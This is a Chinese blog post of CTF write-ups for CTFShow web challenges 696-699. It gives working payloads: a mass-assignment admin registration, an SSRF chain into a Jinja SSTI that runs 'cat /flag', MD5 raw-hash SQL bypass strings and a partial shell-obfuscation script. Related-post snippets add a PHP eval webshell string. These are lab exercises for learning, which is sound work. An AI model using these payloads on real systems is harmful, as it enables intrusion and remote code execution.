CTFSHOW大赛原题篇(web696-web710)

原创 已于 2022-03-02 10:26:59 修改 · 2.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#django #python #后端

于 2022-02-23 16:33:07 首次发布
本文档详细介绍了如何通过Web应用中的SSRF漏洞结合SSTI(模板注入)实现远程代码执行。首先,通过伪造admin用户并利用Django框架中的特性获取权限。然后,利用Web1中的SSRF访问Web2的SSTI,构造特定的JSON payload绕过过滤限制,最终达到执行系统命令获取flag的目的。此外,文中还列举了其他Web漏洞利用技巧,如数组利用、签名伪造、文件包含、命令注入等,展示了多种Web安全攻防策略。

因为题目较多,所以很多地方写的比较简略,望师傅们谅解,祝大家变得更强!

文章目录

web696

下载源码是个django的框架。
web1里面的利用点很明显,存在一个ssrf
在这里插入图片描述
而在web2的app.py中存在ssti模板注入
在这里插入图片描述
所以我们的目的就是通过web1来访问web2,最终通过ssti达到rce的,目的。
在web1中我们想利用ssrf必须先得到token,也就是需要用admin登录。
在这里插入图片描述
所以我们要做的第一步就是伪造一个admin用户,在django中创建admin后,数据库中是用is_superuser进行标识的。为1代表的是管理员。
而用户注册又是将整个data数据写入了数据库。
在这里插入图片描述
所以我们注册的时候可以增加一个is_superuser参数,为了我们能访问所有admin页面,需要再加个is_staff参数
在这里插入图片描述

第一步:

POST:
http://bd2702c0-2cb5-4a00-8320-206e36106a47.challenge.ctf.show/reg/

{"username":"zzx","password":"abc","is_superuser":1,"is_staff":1}

在这里插入图片描述
注册成功并登录进后台后便能看到token的值。
在这里插入图片描述
在web2的caculator路由中,我们需要post传值,而web1中的flask_rpc函数可以帮我们首先这个目的。
在这里插入图片描述
在这里插入图片描述
捋一下思路
通过home中的ssrf来访问rpc,再通过rpc中的ssrf来访问另一台服务器上的caculator路由
大体的json如下


/home

{"url":"http://127.0.0.1:8000/rpc?methods=POST&url=http://127.0.0.1:5000/caculator&data=xxxx","token":"994f639af3c57121cb756fd0bd126478"}

其中的xxx就是我们要传的带有ssti内容的json的base64。
num1和num2没有什么用,因为限制了内容只能是数字。能用的只有symbols了。
所以构造json串

{"num1":"1","num2":"1","symbols","{
  
  {x.__init__.__globals__['__builtins__'].eval('__import__(\"os\").popen(\"cat /flag\").read()')}}-"}

最后加个-是为了绕过对symbols的过滤
在这里插入图片描述
但是题目中对我们的payload做了其他限制
在这里插入图片描述
不过这都是小问题,因为我们是通过json传的,所以可以通过unicode编码绕过。

{"symbols":"\u007b\u007bx.__init__.__globals__['__builtins__'].eval('__import__(\"os\").popen(\"cat /flag\").read()')\u007d\u007d-","num1":"1","num2":"2"}

将这一串进行base64,再传给之前的data就可以了
最终payload,token需要自己改下

/home

{"url":"http://127.0.0.1:8000/rpc?methods=POST&url=http://127.0.0.1:5000/caculator&data=eyJzeW1ib2xzIjoiXHUwMDdiXHUwMDdieC5fX2luaXRfXy5fX2dsb2JhbHNfX1snX19idWlsdGluc19fJ10uZXZhbCgnX19pbXBvcnRfXyhcIm9zXCIpLnBvcGVuKFwiY2F0IC9mbGFnXCIpLnJlYWQoKScpXHUwMDdkXHUwMDdkLSIsIm51bTEiOiIxIiwibnVtMiI6IjIifQ==","token":"994f639af3c57121cb756fd0bd126478"}

有同学可能会问端口怎么来的,其实是猜的,或者爆破也可以。
然后那串ssti的payload怎么来了,具体的话可以看下之前的ssti篇ssti进阶篇

web697

进入页面提示我们传入参数NOHO
在这里插入图片描述
随便试了几下,会提示太大或太小。
虽然看不到代码但是可以猜测一下,可能是使用strcmp一类的函数进行比较,大于返回正整数,小于返回负整数,等于返回0。
所以我们要么找到提交的数和代码中待比较的数相等。要么绕过比较。
很容易想到利用数组,当我们传入的是数组时,返回的值是NULL,反正几部是正整数,也不是负整数,也和0弱等于,试了下果然可以。
?NOHO[]=
下面第二步是有个填密码的框,提交个数字后页面返回了具体的查询语句
在这里插入图片描述
出现了乱码,可能是经过某种加密了,如果是最常见的md5加密的话,我们就可以绕过了。有如下几个字符串,在经过md5加密后的十六进制是自带单引号的。

ffifdyop
e58
4611686052576742364

既然只能传数字,那我们就选择4611686052576742364
在这里插入图片描述

web698

参考文章https://blog.youkuaiyun.com/zz_Caleb/article/details/85082561
比较坑的地方是这个secret_key的长度需要一个个试,真实长度是10
无语了。。。。。
在这里插入图片描述

web699

和群主问过,确实是题目有问题,没问题的话下面的脚本就可以跑出来了。
https://tyskill.github.io/posts/i-soon2020/

import requests
# 八进制
n = dict()
n[0] = '${#}'
n[1] = '${##}'
n[2] = '$((${##}<<${##}))'
n[3] = '$(($((${##}<<${##}))#${##}${##}))'
n[4] =
最低0.47元/天 解锁文章
CTFSHOW大赛(web771-web790)
羽的博客
03-04 1228
因为目较多,所以很多地方写的比较简略,望师傅们谅解。。 暂时先更新到这了,毕竟还是要工作的。。。。 文章目录web771web773web774web775web776web 777web778web779web780web781web782web784web785web786web787web788web789web790 web771 GXYCTF2019 你的名字 目过滤了{{}} 只要使用就直接报错,所以只能用{%%}进行盲注了 然后也过滤了一些字符,但是只是替换成空了。所以可以直接往想使用的字
CTFSHOW大赛(web711-web725)
羽的博客
02-27 4412
文章目录web711web712web713web782web785web786web787web788web789 web711 扫描目录发现存在robots.txt,提示static/secretkey.txt 访问得到一串字符串ctfshow_love_you 然后进入正常的页面,有个登录和注册,随便注册个用户并且登录后,发现存在文件上传点。 但是上传php后缀的文件不解析,应该不是php写的了。 看下session,应该是一个jwt加密的。那就好说了,伪造一个admin用户,而且加密的秘钥应该就是刚
CTFSHOW大赛(web726-web740)
羽的博客
02-27 1254
web726 username=;eval($_POST[1]);phpinfo();// username=%00 同之前的web692 web727 自增绕过 $_=[];$_=$_.'';$_=$_[';'=='$'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;
CTFSHOW大赛(web756-web770)
羽的博客
03-04 1463
因为目较多,所以很多地方写的比较简略,望师傅们谅解。。 文章目录web756web757web758web759web760web761web762web782web785web786web787web788web789 web756 code=GLOBALS web757 每次传入的key前七个字符需要是上传返回的,并且substr(md5($value),5,4)==0) 因为不是每一次md5都有可能字母开头,所以我们需要多测试几次,直接在给的key后面不断加字符就可以了。 import reque
ctfshow-大赛-web702
最新发布
Rsecret2的博客
04-18 1095
我们的思路就是包含一个css文件,这个css文件是压缩到phar中的,那么如何绕过文件上传必须是PNG的限制呢,就可以手动赋值一个文件头。(我们发现这两次的cookie签名值是不同的),如果签名值是不同的那么我们添加theme参数的时候就会让我们重新登录无法进行命令执行了。现在我们需要考虑的是我们怎么凑才能把data这个消息也就是咱们cookie "." 前面的字符串是72位以上呢?这样就可以执行了,我错误的因呢就是拿到最初登录时候给的$signature来拼接了。// www.zip 下载源码。
CTFSHOW大赛(web680-web695)
羽的博客
02-23 3392
CTFSHOW大赛 web680 code=phpinfo(); 先看下disable_function,有一堆过滤。并且open_basedir做了目录限制。 r然后看下当前目录下的文件 code=var_dump(scandir(".")); 发现一个文件secret_you_never_know 直接访问就拿到flag了 。。。。。。(大无语) web681 登录的时候抓个包,比如我们传name=123会返回sql语句 select count(*) from ctfshow_users whe
ctfshow 大赛 web689--web695
2301_81040377的博客
08-01 1479
path这里可以写入文件这里的%26是但是如果直接写的话不能正确的绕过,必须写url形式写马方便。
ctfshow 大赛 web697--web700
2301_81040377的博客
08-01 747
先扫一下,其实也可以不用扫因为什么也扫不出来这里看到有一个参数尝试一下数组随便输了,出了验证回显抓个包看这三个md5加密可以自带引号。
ctfshow web入门 大赛 web680--web688
2301_81040377的博客
07-30 1010
不能使用的函数是这些但是还是可以看文件的看根目录啥也没有看当前目录或者直接访问下载文件。
ctfshow 大赛 680-695
blowed的博客
06-26 1815
ctfshow 大赛
2016 SWPU CTF web1目源码
10-31
2016 SWPU CTF web1目源码
CTFSHOW大赛(web741-web755)
羽的博客
02-28 1120
因为目较多,所以很多地方写的比较简略,望师傅们谅解。。 文章目录web741web742web743web744web745web750web782web785web786web787web788web789 web741 ssrf绕过 url=http://0.0.0.0:8080/flag web742 web743 a[]=1&b[]=2&c[]=1&d[]=2 web744 <?php class ctfshowCURL{ private $url="file:/
CTFSHOW web680-780(大赛)
qq_37561898的博客
01-29 4432
ctfshow CTF ctfshow大赛
CTFShow-大赛改编(未完慢慢更)
paidx0
04-24 3102
文章目录web680web681web682web683web684 create_function()web685web686(无参RCE)姿势一 getallheaders()姿势二 get_defined_vars()姿势三 session_id()web687web688 escapeshellcmd()web689 ssrfmeweb690web691order by 的一个盲注小技巧web692web693web694web695web696web697web698web711web71
【ctf.show-web
一纸荒芜的博客
03-21 3734
主要分享自己做的心得和积累,共勉之。
[ctfshow web入门-大赛]web785-800(部分)
weixin_45751765的博客
06-17 1518
ctfshow web入门大赛 乱序写写 有新做的就补上去吧 稍微刷几个做的人比较少的heihei 顺便记录一下参考羽师傅的文章 brain.md: test文件夹覆盖掉软连接 test文件夹中的内容会写入来test软连接对应的目录 我们动手实测一下 先在uploads目录下建立一个test软连接 然后在别的地方建立一个test文件夹里面随便放个东西 将test文件夹mv至uploads目录下 可以发现软连接所指向的目录多出了test文件夹里存放的东西 niubi 又学到了 zip --symlin
ctfshow 群友挑战 CTFshow福利抽奖
ScyLamb的博客
03-05 1210
打开即可看见flag【域名后面不能有路径,如https://www.baidu.com/】 然后去提交flag,可以清楚的发现没有提交flag的框**!!!** 然后,憨憨的我跑去环境中找,看看有没有后台啥的 再然后,我发现我是憨憨,没有提交框就自己写个呗。。。 如下,简简单单的Python脚本: import requests url='https://ctf.show/api/v1/challenges/attempt' data='{"challenge_id":"1089","submissi.
CTFshowWeb目wp(持续更新)
苦行僧的妖孽日常
08-15 1485
CTFshowWeb目wp(持续更新)
CTFHub Web(3星-6星)
qq_43936524的博客
05-20 2393
三星难度Web afr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
ctfshow大赛
08-09
你好!很高兴回答你关于CTFShow大赛的问CTFShow是国内知名的网络安全竞赛平台,每年都会举办一系列的CTF比赛,吸引了众多安全爱好者的参与。 CTFShow大赛是指比赛中涉及到的各种目类型,包括但不限于密码学、网络安全、逆向工程、Web安全、二进制漏洞等。这些目旨在考察选手的技术能力和解能力,挑战他们的思维和创新能力。 目设计通常会结合实际场景或者常见的安全问,选手需要通过分析、研究和解决问来获取答案或者解密某个加密信息。这些目往往需要具备一定的安全知识和技术背景,同时也需要有良好的团队合作和解思路。 CTFShow大赛目难度各异,既有初级的入门目,也有高级的挑战目,可以满足不同级别选手的需求。同时,CTFShow还会定期更新和发布新的,使得比赛内容更加丰富和多样化。 希望这个回答能满足你的需求,如果你有其他问,可以随时提问!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值